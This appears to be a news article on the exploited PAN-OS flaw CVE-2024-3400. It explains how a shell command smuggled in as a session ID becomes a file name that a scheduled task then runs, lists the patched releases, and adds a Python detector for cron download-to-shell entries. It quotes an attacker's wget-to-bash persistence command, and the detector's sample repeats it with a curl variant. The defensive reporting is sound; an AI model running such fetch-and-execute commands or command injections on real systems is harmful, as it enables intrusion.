

    Palo Alto Networks Unveils Further Insights on Critical PAN-OS Vulnerability Subject to Attack

    Palo Alto Networks has shared more details about a critical security flaw in PAN-OS that is being exploited in the wild.

    The company described the vulnerability, tracked as CVE-2024-3400 (CVSS score: 10.0), as “complex”: it arises from the combination of two bugs in PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1.

    “In the initial instance, the GlobalProtect service inadequately authenticated the session ID format prior to their storage. This facilitated the storage of an empty file bearing the chosen filename of the attacker,” said Chandan B. N., senior director of product security at Palo Alto Networks.

    “The subsequent glitch (operating under the assumption that the files were system-generated) incorporated the filenames into a command.”

    Neither issue is critical on its own, but chained together they allow unauthenticated remote shell command execution.

    Palo Alto Networks said the threat actor behind the zero-day exploitation of the flaw, tracked as UTA0218, carried out a two-stage attack to gain command execution on vulnerable devices. The activity is being tracked as Operation MidnightEclipse.

    As previously disclosed by Volexity and the company’s own Unit 42 threat intelligence team, this involves sending specially crafted requests containing the command to be executed, which is then run by a backdoor known as UPSTYLE.

    “The initial persistence mechanism established by UTA0218 involved configuring a cron job tasked with employing wget to fetch a payload from an assailant-controlled URL, with its output directed to stdout and piped to bash for execution,” detailed Volexity last week.

    “The attacker employed this method to deploy and execute specific commands and download reverse proxy tools such as GOST (GO Simple Tunnel).”

    Unit 42 said it could not determine which commands were executed via this mechanism (wget -qO- hxxp://172.233.228[.]93/policy | bash), but assessed that the cron job-based implant is likely used for post-exploitation activity.
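    The cron-based persistence described above (a scheduled download piped straight into bash) is easy to hunt for in a crontab dump. The following is an added example, not part of the original article and not Volexity’s or Unit 42’s tooling; the crontab lines are constructed for illustration, and only the defanged URL hxxp://172.233.228[.]93/policy is taken from the reporting.

```python
"""Flag crontab entries that pipe a remote download straight into a shell.

Added example; not Volexity's or Unit 42's code. SAMPLE_CRONTAB is constructed,
except for the defanged URL taken from the article.
"""
import re

# A downloader (wget/curl) whose output is piped into a shell interpreter,
# e.g. "wget -qO- http://host/payload | bash" or "curl -s ... | /bin/sh".
DOWNLOAD_TO_SHELL = re.compile(
    r"\b(?:wget|curl)\b[^|\n]*\|\s*(?:/bin/|/usr/bin/)?(?:ba|z|da)?sh\b"
)
# Any URL, including the defanged "hxxp" and "[.]" forms used in threat reports.
URL = re.compile(r"""h(?:xx|tt)ps?://[^\s'"|;]+""")


def parse_crontab(text):
    """Return [(schedule, command)] for each real entry in a crontab dump.

    Skips blanks, comments and VAR=value lines; handles the five-field
    schedule layout and @reboot-style shortcuts."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        first = line.split(None, 1)[0]
        if "=" in first:                 # environment assignment such as PATH=...
            continue
        if line.startswith("@"):         # @reboot, @hourly, ...
            schedule, command = line.split(None, 1)
        else:
            parts = line.split(None, 5)
            if len(parts) < 6:           # malformed entry, nothing to run
                continue
            schedule, command = " ".join(parts[:5]), parts[5]
        entries.append((schedule, command))
    return entries


def find_download_to_shell(text):
    """Return [(schedule, command, url_or_None)] for entries that fetch and run code."""
    hits = []
    for schedule, command in parse_crontab(text):
        if DOWNLOAD_TO_SHELL.search(command):
            m = URL.search(command)
            hits.append((schedule, command, m.group(0) if m else None))
    return hits


# Constructed sample: two benign jobs, one entry mirroring the reported
# wget-to-bash job, and one curl-to-sh variant on an invalid (non-routable) host.
SAMPLE_CRONTAB = """\
# constructed sample for illustration
PATH=/usr/bin:/bin
0 3 * * * /usr/bin/logrotate /etc/logrotate.conf
* * * * * wget -qO- hxxp://172.233.228[.]93/policy | bash
@reboot curl -s https://updates.example.invalid/agent.sh | /bin/sh
30 2 * * 0 tar czf /var/backups/etc.tgz /etc
"""

if __name__ == "__main__":
    for schedule, command, url in find_download_to_shell(SAMPLE_CRONTAB):
        print(f"[{schedule}] {command}  <- fetches {url}")
```

    On a real device the input would be the output of `crontab -l` for each user plus the contents of /etc/cron.d, and a hit is a reason to pull the remote URL as an indicator and examine the fetched script, not proof of compromise by itself.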

    “In phase 1, the assailant transmits a meticulously crafted shell command instead of a valid session ID to GlobalProtect,” Chandan explained. “This results in the creation of an empty file on the system, bearing an embedded command as its filename, as dictated by the assailant.”

    “In phase 2, an unsuspecting scheduled system task that executes periodically employs the filename provided by the attacker in a command. This leads to the execution of the assailant-supplied command with elevated privileges.”

    Palo Alto Networks initially said that successful exploitation of CVE-2024-3400 required the firewall to be configured as a GlobalProtect gateway or GlobalProtect portal (or both) and to have device telemetry enabled, but it has since confirmed that device telemetry has no bearing on the issue, so disabling telemetry is not a mitigation.

    The revision follows findings from Bishop Fox, which identified ways to exploit the flaw that do not require telemetry to be enabled on the device.

    The company has also extended the fixes beyond the main releases in recent days to cover other commonly deployed maintenance releases:

    • PAN-OS 10.2.9-h1
    • PAN-OS 10.2.8-h3
    • PAN-OS 10.2.7-h8
    • PAN-OS 10.2.6-h3
    • PAN-OS 10.2.5-h6
    • PAN-OS 10.2.4-h16
    • PAN-OS 10.2.3-h13
    • PAN-OS 10.2.2-h5
    • PAN-OS 10.2.1-h2
    • PAN-OS 10.2.0-h3
    • PAN-OS 11.0.4-h1
    • PAN-OS 11.0.4-h2
    • PAN-OS 11.0.3-h10
    • PAN-OS 11.0.2-h4
    • PAN-OS 11.0.1-h4
    • PAN-OS 11.0.0-h3
    • PAN-OS 11.1.2-h3
    • PAN-OS 11.1.1-h1
    • PAN-OS 11.1.0-h3

    With CVE-2024-3400 under active exploitation and proof-of-concept (PoC) exploit code publicly available, users are strongly advised to apply the hotfixes as soon as possible.

    The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has also added the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog, requiring federal agencies to secure their devices by April 19, 2024.

    According to data shared by the Shadowserver Foundation, an estimated 22,542 internet-exposed firewall devices were vulnerable to CVE-2024-3400 as of April 18, 2024, most of them in the U.S., Japan, India, Germany, the U.K., Canada, Australia, France, and China.
